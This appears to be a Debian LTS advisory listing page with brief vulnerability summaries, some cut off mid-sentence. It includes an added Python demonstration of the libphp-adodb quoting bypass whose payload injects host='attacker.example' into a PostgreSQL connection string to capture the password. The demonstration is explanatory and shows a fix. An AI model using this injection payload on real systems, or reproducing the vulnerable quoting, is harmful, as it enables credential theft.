Debian LTS: DLA-2913-1: xterm security update
xterm, an X terminal emulator, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.
Thomas Chauchefoin from SonarSource discovered that in Zabbix, a server/client network monitoring system, after the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. An
It was found that in libphp-adodb, a PHP database abstraction layer library, an attacker can inject values into the PostgreSQL connection string by bypassing adodb_addslashes(). The function can be bypassed in phppgadmin, for example, by surrounding the username in quotes and
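The bypass described above, as an added example written for this page rather than code from libphp-adodb or phppgadmin: the quoting helper is re-created in Python with the behaviour the advisory describes (a value that is already wrapped in single quotes is passed through without escaping), a hardened variant that always escapes is shown next to it, and a minimal libpq-style keyword=value parser shows what each produces. The connection-string template, the host names and the credentials are assumptions chosen for the demonstration.

```python
# Added example: adodb_addslashes()-style quoting bypass, re-created in Python.
# Not libphp-adodb's own source. Template, hosts and credentials are assumed.

def php_addslashes(s: str) -> str:
    """Mimic PHP addslashes(): backslash-escape ' " \\ and NUL."""
    out = []
    for ch in s:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def quote_vulnerable(s: str) -> str:
    """Quoting with the flaw the advisory describes: a value that already
    starts and ends with a single quote is trusted as pre-quoted and returned
    unchanged, so nothing inside it gets escaped."""
    if s == "":
        return "''"
    if len(s) >= 2 and s[0] == "'" and s[-1] == "'":
        return s
    return "'" + php_addslashes(s) + "'"


def quote_fixed(s: str) -> str:
    """Hardened quoting: always escape and always wrap, no pre-quoted shortcut."""
    return "'" + php_addslashes(s) + "'"


def build_conninfo(quote, user, password, host="db.internal", dbname="app"):
    """Assumed connection-string template in libpq keyword=value syntax."""
    return (f"host={host} user={quote(user)} "
            f"password={quote(password)} dbname={quote(dbname)}")


def parse_conninfo(conn: str) -> dict:
    """Minimal libpq-style parser: values may be single-quoted, with \\' and
    \\\\ escapes; a repeated keyword overrides the earlier one, as libpq does."""
    params, i, n = {}, 0, len(conn)
    while i < n:
        while i < n and conn[i].isspace():
            i += 1
        if i >= n:
            break
        eq = conn.find("=", i)
        if eq < 0:
            raise ValueError("missing '=' in connection string")
        key = conn[i:eq].strip()
        i = eq + 1
        while i < n and conn[i].isspace():
            i += 1
        if i < n and conn[i] == "'":
            i += 1
            val = []
            while i < n and conn[i] != "'":
                if conn[i] == "\\" and i + 1 < n:
                    i += 1
                val.append(conn[i])
                i += 1
            i += 1  # skip closing quote
            params[key] = "".join(val)
        else:
            j = i
            while j < n and not conn[j].isspace():
                j += 1
            params[key] = conn[i:j]
            i = j
    return params


# Constructed attacker-controlled username: wrapped in quotes so the vulnerable
# helper passes it through, and carrying an injected host= keyword.
PAYLOAD = "'alice' host='attacker.example'"


def demo(password="s3cret"):
    """Return the parsed parameters for the vulnerable and the fixed quoting."""
    vuln = parse_conninfo(build_conninfo(quote_vulnerable, PAYLOAD, password))
    fixed = parse_conninfo(build_conninfo(quote_fixed, PAYLOAD, password))
    return vuln, fixed


if __name__ == "__main__":
    vuln, fixed = demo()
    print("vulnerable ->", vuln)  # host is attacker.example, credentials go there
    print("fixed      ->", fixed)  # host stays db.internal, payload is just the user
```

With the vulnerable helper the injected `host=` keyword wins because libpq takes the last occurrence of a repeated keyword, so the real password is sent to the attacker's host; with the hardened helper the whole payload is parsed as a literal username.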
Several vulnerabilities have been discovered in apng2gif, a tool for converting APNG images to animated GIF format. Improper sanitization of user input can result in denial of service (application crash) or possible execution of arbitrary code if a malformed image file is processed.
Zhuowei Zhang discovered a bug in the EAP authentication client code of strongSwan, an IKE/IPsec suite, that may allow bypassing client authentication and, in some scenarios, even server authentication, or could lead to a denial of service.
Several security vulnerabilities have been discovered in librecad, a computer-aided design (CAD) system. Buffer overflows may lead to remote code execution if a specially crafted JWW document is processed.
Two vulnerabilities have been discovered in the Apache HTTP server: CVE-2021-44224
It was discovered that there were two vulnerabilities in Django, a popular Python-based web development framework: - CVE-2022-22818: Possible XSS via {% debug %} template tag.
Multiple security vulnerabilities have been discovered in Apache Log4j 1.2, a Java logging framework, when it is configured to use JMSSink, JDBCAppender, JMSAppender or Apache Chainsaw which could be exploited for remote code execution.